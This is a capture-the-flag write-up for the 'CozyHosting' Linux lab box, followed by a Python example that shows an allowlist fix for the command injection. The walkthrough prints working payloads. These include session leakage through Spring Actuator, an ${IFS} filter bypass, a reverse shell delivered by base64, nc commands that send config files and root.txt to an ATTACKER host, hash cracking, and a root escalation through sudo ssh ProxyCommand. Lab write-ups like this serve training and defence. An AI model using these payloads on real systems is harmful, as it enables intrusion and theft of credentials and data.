Summary
Easy Linux box. Spring Boot Actuator /actuator/sessions leaks an active
session cookie → admin panel → SSH-execution form has command injection
(whitespace filter bypassed with ${IFS}) → shell as app. Extract DB
credentials from the JAR; bcrypt for admin cracks to a single rockyou
word, reused by josh. Privesc: sudo /usr/bin/ssh * → ProxyCommand → root.
Flags
Captured locally (omitted per writeup policy).
Recon
22/tcp OpenSSH 8.9p1 Ubuntu
80/tcp nginx 1.18.0 cozyhosting.htb (Spring Boot)
Foothold — Actuator + cmd injection
# Leak session cookies
curl http://cozyhosting.htb/actuator/sessions
# {"A586...":"kanderson"}
# kanderson session has admin panel access (HTTP 200)
# Admin panel: POST /executessh with host= and username= fields
# Filter rejects spaces; ${IFS} bypasses it
# ${IFS} must be literal in the injected payload — use single quotes locally
# Write reverse shell via base64 (no spaces in b64 string)
# username=;echo${IFS}B64PAYLOAD|base64${IFS}-d>/tmp/r.sh;# (single-quoted locally)
# username=;bash${IFS}/tmp/r.sh;#
# → shell as app (uid=1001)
Credential Extraction
# Extract DB config from JAR
;unzip${IFS}-p${IFS}/app/cloudhosting-0.0.1.jar${IFS}BOOT-INF/classes/application.properties|nc${IFS}ATTACKER${IFS}PORT;#
# spring.datasource.password=<pg-pw> (& in password needs careful quoting)
# spring.datasource.username=postgres
# DB: cozyhosting on localhost:5432
# Query users table (deploy script via base64 due to & in password)
export PGPASSWORD='<pg-pw>'
psql -h 127.0.0.1 -U postgres -d cozyhosting -c "select * from users;"
# admin : $2a$10$<bcrypt-hash>
hashcat -m 3200 hash.txt rockyou.txt
# <cracked-pw>
ssh josh@cozyhosting.htb # password reuse
# user.txt ✓
Privesc — sudo ssh ProxyCommand
sudo -l
# (root) /usr/bin/ssh *
# sudo requires use_pty → use -tt with sudo -S
echo '<cracked-pw>' | sudo -S /usr/bin/ssh \
-o ProxyCommand='cat /root/root.txt | nc ATTACKER PORT' x
# root.txt ✓
Key Techniques
- Spring Actuator /actuator/sessions: ships permissive by default; reveals live session tokens.
- ${IFS} whitespace bypass: bash IFS expansion defeats space-denylist filters. Critical: keep ${IFS} literal in the locally-sent payload (single-quote the shell variable or escape with \$), otherwise the local shell expands it to a real space before sending.
- Script exfil pattern: for commands containing shell metacharacters (&, ", etc.), base64-encode a script, decode it to /tmp, execute separately.
- sudo ssh → GTFOBins: ProxyCommand runs through the user’s shell. use_pty in sudoers requires a PTY — satisfy with -tt and sudo -S.
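Added example (not from the writeup or the target app) showing why the space-only denylist behind /executessh fails against ${IFS} and what the fix looks like: an allowlist for host and username plus an argv list that never touches a shell. denylist_check, allowlist_check and build_ssh_argv are hypothetical names.

```python
import re

# Approximation of the writeup's /executessh filter: only a literal space
# is rejected. Constructed for illustration, not the application's code.
def denylist_check(value: str) -> bool:
    """Return True if a space-only denylist would accept the value."""
    return " " not in value

# Allowlist: accept only characters a DNS hostname or Unix username can hold.
# ${IFS}, ';', '|', '#' and friends can never pass these patterns.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?"
    r"(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$"
)
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")

def allowlist_check(host: str, username: str) -> bool:
    """Return True only when both fields match the strict allowlist."""
    return bool(HOSTNAME_RE.fullmatch(host) and USERNAME_RE.fullmatch(username))

def build_ssh_argv(host: str, username: str) -> list:
    """Build an argv list for subprocess.run(..., shell=False).

    Raises ValueError on invalid input. Because no shell parses the result,
    metacharacters would be inert even if the allowlist were later relaxed.
    """
    if not allowlist_check(host, username):
        raise ValueError("host or username failed allowlist validation")
    return ["ssh", "-o", "BatchMode=yes", f"{username}@{host}"]

if __name__ == "__main__":
    # Constructed inputs: the writeup's injected username vs. a legitimate one.
    injected = ";bash${IFS}/tmp/r.sh;#"
    print("denylist accepts injected:", denylist_check(injected))          # True
    print("allowlist accepts injected:", allowlist_check("cozyhosting.htb", injected))  # False
    print(build_ssh_argv("cozyhosting.htb", "kanderson"))
```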